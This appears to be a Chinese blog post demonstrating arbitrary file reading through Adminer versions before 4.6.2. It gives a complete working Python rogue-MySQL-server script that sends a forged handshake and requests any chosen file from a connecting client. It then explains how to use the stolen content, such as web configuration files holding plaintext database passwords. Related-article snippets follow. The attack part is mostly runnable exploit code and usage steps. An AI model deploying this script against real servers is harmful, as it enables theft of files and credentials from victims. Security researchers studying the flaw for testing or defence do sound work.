mysql-adminer任意文件读取

最新推荐文章于 2023-08-31 21:19:45 发布
最新推荐文章于 2023-08-31 21:19:45 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: # sql漏洞利用 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51478862/article/details/124581461
版权

利用条件

1.adminer(版本小于4.6.2)可以远程连接数据库,
2.或者可以使靶机服务器主动连接自己的伪造的mysql服务器

原理

攻击者搭建一个伪造的mysql服务器,当有用户去连接上这个伪造的服务器时。
攻击者就可以任意读取受害者的文件内容。,也就是A连接B的数据库,B可以伪造假的数据库服务读取A服务器上的文件。
所以基于adminer连接的数据库可以反向利用连接自己的恶意服务器,从而达到读取任意文件的目的。

演示:

先下载好adminer,直接放在根路径即可:(攻击的服务器有adminerWeb服务)
image.png

poc

攻击机要有mysql服务并且使用2.7的python环境,kali自带,mysql服务虽然要有但不要开启,否则会报端口占用的错误
把下面文件保存成py文件

# coding=utf-8
import socket
import logging
import sys

logging.basicConfig(level=logging.DEBUG)

filename = sys.argv[1]
sv = socket.socket()
sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sv.bind(("", 3306))
sv.listen(5)
conn, address = sv.accept()
logging.info('Conn from: %r', address)
conn.sendall(
    "\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)
logging.info("want file...")
wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
conn.sendall(wantfile)
content = conn.recv(9999)
logging.info(content)
conn.close()

使用方式:

直接跟上要读取的文件绝对路径,然后就会处于监听状态,注意不能够直接读取文件夹
image.png
若出现下面的报错,则需要把mysql的3306端口关闭:

在web页面服务器ip输入攻击机ip(kali的Ip)剩下的
随便输入:
image.png
发现出现报错的绝对路径,并成功在kali服务器上接收到文件内容:

image.png
目前这个方法暂时不能针对超级弱口令爆破,因为会连接重置。但是正常登录下也是可以读取到任意文件
所以可以读取web服务的默认配置文件,若对目录足够熟悉可以直接读取web服务配置数据库的文件获取明文密码:

通过命令框连接

若可以在服务端执行命令,也可以直接读取。密码随便输

虚无-缥缈
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mssql 数据导成文件_Adminer4.6.2任意文件读取漏洞
weixin_39866741的博客
12-16 614
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类...
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdminMySQL 管理客
渗透测试中遇到的Adminer任意文件读取漏洞
网安君的博客
01-17 6130
在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
raven2靶机-udf提权
CTF小杂鱼的专栏
08-18 1039
较早的一台靶机,练习udf提权挺不错的。 考点:CVE 2016-10033、Mysql-udf提权 1、靶机导入虚拟机并开机,确定网络是nat模式,所在网络C段为192.168.43.1/24 2、C段探测寻找靶机入口点: nmap -T4 -n -v 192.168.43.1/24 -sn 得到靶机IP:192.168.43.146 3、探测靶机开放服务 nmap -T4 -n -v 192.168.43.146 4、打开http://192.168.43.1...
HackTheBox::Admirer
aya3t的博客
10-14 779
HackTheBox::Admirer
任意文件读取及漏洞复现
来日可期的博客
08-31 3190
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
adminer-4.7.7_Adminer_MYSQL_php_
09-28
mysql类数据库管理工具adminer-4.7.7最新版。
laravel-adminer:Laravel 5+的管理员数据库管理器
02-04
各种数据库支持:MySQL,SQLite,PostgreSQL,Oracle,MS SQL,Firebird,SimpleDB,MongoDB,Elasticsearch等。 v5.0新功能: 启用自动登录数据库(默认值: false ) 自定义路由前缀(默认值: adminer ) ...
adminer MySQL管理客户端 v4.7.5
08-23
Adminer是一个类似于phpMyAdminMySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持P
adminer-PHP
06-20
<p>Adminer是一个类似于phpMyAdminMySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的...
渗透入侵\二级域名爆破工具.zip
07-15
二级域名爆破工具
登录密码爆破
gl620321的博客
08-11 5999
一、登录密码爆破 1.登录猜解猜解用户密码爆破属于撞库一类。通过弱口令字典暴力尝试登陆达到猜解用户密码。 2.一般登陆都要验证码,而突破验证码主要有两种: 绕过严重码 自动识别验证码 管理院权限登陆 开启了session,随机生成了一串字符串 查看登陆检测,判断是否开启传输了三个post 存在的话去判断验证码 验证码要是和session的不同,它就回到login这个页面 匹配的话,...
Mysql管理工具之Adminer
06-24 383
Adminer是一个类似于phpMyAdminMySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。   Features 1)、Interface to select and edit data ready for your client...
phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)
cj_Hydra's Blog
04-23 1463
前言: 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1245
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 2411
该篇记录了Web漏洞-任意文件读取漏洞
记一次偶遇Adminer
zhangge3663的博客
10-30 660
又是无聊的一天打开高危扫描器开扫,结果啥也没扫出来,然后就开始苦逼的一个一个站看了。然后发现下面这个站dedecms,服务器windows 各种历史洞打了一遍都没用,因为是windows可以用这个跑下后台 import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = "" flag = 0 url = "http://www.test.com/tags..
phpMyAdmin 2.x版本任意文件读取
网络安全。
01-18 848
0x01 简介 phpmyadmin scripts/setup.php 页面存在反序列化漏洞(WooYun-2016-199433) phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02 漏洞复现 POST /scripts/setup.php HTTP/1.1 Host: ip:8080 User-Agent: Mozilla/5...
PhpMyadmin任意文件读取漏洞
ytfhjhv的博客
11-14 1096
PhpMyadmin任意文件读取漏洞
centos安装Adminer
最新发布
09-25
### 回答1: Adminer是一个免费的Web管理数据库的工具,支持多种数据库。安装Adminer非常简单,以下是在CentOS上安装Adminer的步骤: 1. 安装Apache和PHP ``` sudo yum install httpd php php-mysql ``` 2. 下载Adminer ``` sudo wget https://github.com/vrana/adminer/releases/latest/download/adminer-x.x.x.php -O /var/www/html/adminer.php ``` 请将`x.x.x`替换为最新版本号。 3. 设置文件权限 ``` sudo chown apache:apache /var/www/html/adminer.php ``` 4. 重启Apache ``` sudo systemctl restart httpd ``` 现在您可以通过浏览器访问`http://your_server_ip/adminer.php`来使用Adminer了。请注意,为了安全起见,建议在使用Adminer后将其删除或重命名为其他名称。 ### 回答2: 要在CentOS上安装Adminer,可以按照以下步骤进行操作: 1. 首先,确保你的CentOS系统已经安装了Apache、MySQL和PHP。你可以使用以下命令来安装它们: ``` sudo yum install httpd mysql-server php php-mysql ``` 2. 下载Adminer压缩包。你可以在Adminer的官方网站上找到最新的版本,并使用wget命令下载它: ``` sudo wget https://www.adminer.org/latest.php ``` 3. 解压缩下载的文件,并将其移动到Apache的默认网站目录下: ``` sudo tar -xzvf latest.php sudo mv adminer-*.php /var/www/html/adminer.php ``` 4. 接下来,你需要修改Apache配置文件,以允许访问Adminer。打开`/etc/httpd/conf/httpd.conf`文件,并添加以下行: ``` Alias /adminer /var/www/html/adminer.php <Directory /var/www/html/adminer.php> Options FollowSymLinks AllowOverride All Require all granted </Directory> ``` 5. 重新启动Apache服务器: ``` sudo systemctl restart httpd ``` 6. 最后,打开你的Web浏览器,并访问`http://your_server_ip/adminer`。你将看到Adminer的登录页面,在这里你可以使用MySQL数据库的凭据进行登录并管理数据库。 通过按照以上步骤操作,你可以在CentOS上成功安装并使用Adminer进行数据库管理。 ### 回答3: 在CentOS上安装Adminer可以按照以下步骤进行: 首先,确保你已经在CentOS上安装了PHP和MySQL。如果没有安装,请使用以下命令安装: 1. 安装PHP:sudo yum install php php-mysql 2. 安装MySQL:sudo yum install mysql-server 3. 启动MySQL:sudo systemctl start mysqld 4. 设置MySQL开机自启动:sudo systemctl enable mysqld 接下来,下载Adminer的PHP文件: 1. 进入合适的目录(例如/var/www/html):cd /var/www/html 2. 下载Adminer的PHP文件:sudo wget https://github.com/vrana/adminer/releases/latest/download/adminer.php 然后,配置Web服务器以访问Adminer: 1. 如果使用Apache作为Web服务器,编辑Apache配置文件:sudo vi /etc/httpd/conf/httpd.conf 2. 在文件中找到`<Directory "/var/www/html">`,在其下面添加以下内容: ``` AllowOverride All Require all granted ``` 3. 保存文件并退出编辑器。 4. 重启Apache服务:sudo systemctl restart httpd 最后,可以通过浏览器访问Adminer: 1. 打开你的浏览器,并输入服务器的IP地址或域名,加上adminer.php的路径。例如:http://你的IP地址/adminer.php 2. 输入MySQL的用户名和密码来登录Adminer。 现在,你已经成功在CentOS上安装并访问了Adminer。你可以使用Adminer来管理和查询MySQL数据库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚无-缥缈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值